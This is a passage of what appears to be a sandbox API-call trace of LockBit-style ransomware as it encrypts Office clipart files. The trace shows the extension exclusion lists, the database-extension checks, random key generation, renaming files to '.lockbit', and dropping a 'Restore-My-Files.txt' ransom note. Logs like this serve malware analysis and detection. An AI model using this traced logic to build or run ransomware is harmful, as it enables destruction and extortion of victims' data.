CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.983] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x564eabb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x843a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0186360.WMF", cAlternateFileName="")) returned 1 [0147.983] lstrcmpiW (lpString1=".", lpString2="J0186360.WMF") returned -1 [0147.983] lstrcmpiW (lpString1="..", lpString2="J0186360.WMF") returned -1 [0147.983] PathFindExtensionW (pszPath="J0186360.WMF") returned=".WMF" [0147.983] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.983] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0147.983] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.983] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.983] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.983] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.983] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.983] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.983] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.983] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.983] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.983] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.983] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.983] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.983] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.984] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.984] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.984] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.984] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.984] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0147.984] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.984] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.984] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.984] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.984] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.984] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.984] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.984] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.984] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.984] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.984] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.984] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.984] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.984] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.984] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.984] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.984] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.984] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0147.984] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0147.984] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.984] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.985] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.985] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.985] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.985] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.985] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.985] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.985] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0186360.WMF") returned 1 [0147.985] lstrcmpiW (lpString1="ntldr", lpString2="J0186360.WMF") returned 1 [0147.985] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0186360.WMF") returned 1 [0147.985] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0186360.WMF") returned -1 [0147.985] lstrcmpiW (lpString1="autorun.inf", lpString2="J0186360.WMF") returned -1 [0147.985] lstrcmpiW (lpString1="thumbs.db", lpString2="J0186360.WMF") returned 1 [0147.985] lstrcmpiW (lpString1="iconcache.db", lpString2="J0186360.WMF") returned -1 [0147.985] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.985] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186360.WMF") returned=".WMF" [0147.985] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.985] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.985] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.985] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.985] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.985] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.985] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.985] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.985] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.985] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.985] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.985] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.985] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.985] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0147.985] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0147.986] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.986] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.986] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.986] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.986] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.986] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.986] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.986] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.986] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.986] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.986] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.986] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.986] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.986] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186360.WMF.lockbit") returned 72 [0147.986] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186360.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186360.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0147.987] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.987] malloc (_Size=0x40068) returned 0x3df0008 [0147.987] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=33850) returned 1 [0147.987] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.988] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.988] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0147.988] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.989] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.989] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0147.989] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0148.106] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186360.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186360.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0148.106] malloc (_Size=0xa6) returned 0x1fa2ed8 [0148.106] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0148.141] free (_Block=0x1fa2ed8) [0148.141] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186360.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0148.142] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0148.142] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0148.142] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65fbf9f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x44fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0186362.WMF", cAlternateFileName="")) returned 1 [0148.142] lstrcmpiW (lpString1=".", lpString2="J0186362.WMF") returned -1 [0148.142] lstrcmpiW (lpString1="..", lpString2="J0186362.WMF") returned -1 [0148.142] PathFindExtensionW (pszPath="J0186362.WMF") returned=".WMF" [0148.142] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0148.142] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0148.142] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0148.142] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0148.142] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0148.142] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0148.142] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0148.142] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0148.142] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0148.142] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0148.142] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0148.142] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0148.142] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0148.142] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0148.142] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0148.142] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0148.142] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0148.142] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0148.142] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0148.143] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0148.143] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0148.143] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0148.143] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0148.143] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0148.143] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0148.143] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0148.143] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0148.143] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0148.143] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0148.143] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0148.143] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0148.143] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0148.143] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0148.143] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0148.143] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0148.143] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0148.143] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0148.143] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0148.143] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0148.143] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0148.143] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0148.143] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0148.143] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0148.143] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0148.143] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0148.143] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0148.143] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0148.143] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0186362.WMF") returned 1 [0148.143] lstrcmpiW (lpString1="ntldr", lpString2="J0186362.WMF") returned 1 [0148.144] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0186362.WMF") returned 1 [0148.144] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0186362.WMF") returned -1 [0148.144] lstrcmpiW (lpString1="autorun.inf", lpString2="J0186362.WMF") returned -1 [0148.144] lstrcmpiW (lpString1="thumbs.db", lpString2="J0186362.WMF") returned 1 [0148.144] lstrcmpiW (lpString1="iconcache.db", lpString2="J0186362.WMF") returned -1 [0148.144] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0148.144] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186362.WMF") returned=".WMF" [0148.144] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0148.144] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0148.144] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0148.144] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0148.144] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0148.144] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0148.144] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0148.144] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0148.144] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0148.144] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0148.144] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0148.144] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0148.144] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0148.144] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0148.144] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0148.144] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0148.144] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0148.144] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0148.144] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0148.144] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0148.144] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0148.145] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0148.145] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0148.145] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0148.145] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0148.145] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0148.145] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0148.145] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0148.145] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186362.WMF.lockbit") returned 72 [0148.145] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186362.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186362.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0148.146] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0148.146] malloc (_Size=0x40068) returned 0x3df0008 [0148.146] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=17662) returned 1 [0148.146] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.147] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.147] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0148.147] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.147] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.147] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0148.147] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0148.152] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186362.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186362.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0148.152] malloc (_Size=0xa6) returned 0x1fa2ed8 [0148.152] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0148.153] free (_Block=0x1fa2ed8) [0148.153] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186362.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0148.153] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0148.153] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0148.153] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x564eabb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4724, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0186364.WMF", cAlternateFileName="")) returned 1 [0148.154] lstrcmpiW (lpString1=".", lpString2="J0186364.WMF") returned -1 [0148.154] lstrcmpiW (lpString1="..", lpString2="J0186364.WMF") returned -1 [0148.154] PathFindExtensionW (pszPath="J0186364.WMF") returned=".WMF" [0148.154] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0148.154] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0148.154] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0148.154] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0148.154] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0148.154] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0148.154] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0148.154] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0148.154] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0148.154] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0148.154] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0148.154] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0148.154] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0148.154] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0148.154] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0148.154] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0148.154] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0148.154] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0148.154] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0148.154] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0148.154] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0148.154] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0148.154] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0148.155] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0148.155] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0148.155] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0148.155] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0148.155] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0148.155] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0148.155] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0148.155] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0148.155] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0148.155] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0148.155] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0148.155] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0148.155] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0148.155] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0148.155] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0148.155] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0148.155] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0148.155] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0148.155] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0148.155] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0148.155] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0148.155] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0148.155] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0148.155] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0148.155] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0186364.WMF") returned 1 [0148.155] lstrcmpiW (lpString1="ntldr", lpString2="J0186364.WMF") returned 1 [0148.155] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0186364.WMF") returned 1 [0148.155] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0186364.WMF") returned -1 [0148.156] lstrcmpiW (lpString1="autorun.inf", lpString2="J0186364.WMF") returned -1 [0148.156] lstrcmpiW (lpString1="thumbs.db", lpString2="J0186364.WMF") returned 1 [0148.156] lstrcmpiW (lpString1="iconcache.db", lpString2="J0186364.WMF") returned -1 [0148.156] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0148.156] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186364.WMF") returned=".WMF" [0148.156] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0148.156] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0148.156] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0148.156] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0148.156] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0148.156] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0148.156] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0148.156] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0148.156] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0148.156] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0148.156] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0148.156] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0148.156] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0148.156] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0148.156] lstrcmpiW 